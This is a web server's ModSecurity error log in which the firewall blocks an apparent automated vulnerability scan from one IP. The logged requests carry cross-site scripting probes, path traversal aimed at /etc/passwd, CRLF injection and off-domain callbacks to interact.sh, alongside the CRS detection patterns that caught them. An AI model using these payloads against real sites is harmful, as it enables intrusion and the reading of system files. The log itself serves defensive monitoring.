[Tue Aug 29 11:52:51.875483 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15o8Co-f0AAAnTlWIAAAAA"]
[Tue Aug 29 11:52:52.211294 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15pMCo-f0AAAoLfMYAAAAG"]
[Tue Aug 29 11:52:52.651153 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfkip.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAnHQp0AAAAT"]
[Tue Aug 29 11:52:52.720221 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAoLfM4AAAAG"]
[Tue Aug 29 11:52:52.831356 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAlUlx4AAAA0"]
[Tue Aug 29 11:52:55.796352 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoQ3OMAAAAN"]
[Tue Aug 29 11:52:55.894610 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15p8Co-f0AAAofm2wAAAAX"]
[Tue Aug 29 11:52:55.982916 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAoLfOAAAAAG"]
[Tue Aug 29 11:52:57.793384 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15qcCo-f0AAAoZ6QoAAAAK"]
[Tue Aug 29 11:52:59.156120 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAnTlYkAAAAA"]
[Tue Aug 29 11:53:00.669560 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAohZ5MAAAAZ"]
[Tue Aug 29 11:53:00.691348 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAofm3wAAAAX"]
[Tue Aug 29 11:53:01.573266 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAoT7TQAAAAD"]
[Tue Aug 29 11:53:01.895761 2023] [:error] [pid 2601] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAopQ0IAAAAi"]
[Tue Aug 29 11:53:02.682812 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAoXJtcAAAAP"]
[Tue Aug 29 11:53:02.739306 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAoXJtgAAAAP"]
[Tue Aug 29 11:53:04.447783 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAoT7TgAAAAD"]
[Tue Aug 29 11:53:04.776121 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAoLfPoAAAAG"]
[Tue Aug 29 11:53:04.868764 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAoesKsAAAAV"]
[Tue Aug 29 11:53:06.051065 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAohZ6IAAAAZ"]
[Tue Aug 29 11:53:07.556756 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15s8Co-f0AAAojaoQAAAAb"]
[Tue Aug 29 11:53:08.074701 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoesLAAAAAV"]
[Tue Aug 29 11:53:08.252890 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAoAkwYAAAAC"]
[Tue Aug 29 11:53:08.777941 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAn403AAAAAW"]
[Tue Aug 29 11:53:09.572279 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tcCo-f0AAAoT7UQAAAAD"]
[Tue Aug 29 11:53:10.421593 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAoXJukAAAAP"]
[Tue Aug 29 11:53:11.800682 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15t8Co-f0AAAohZ64AAAAZ"]
[Tue Aug 29 11:53:11.809056 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15t8Co-f0AAAni-B8AAAAU"]
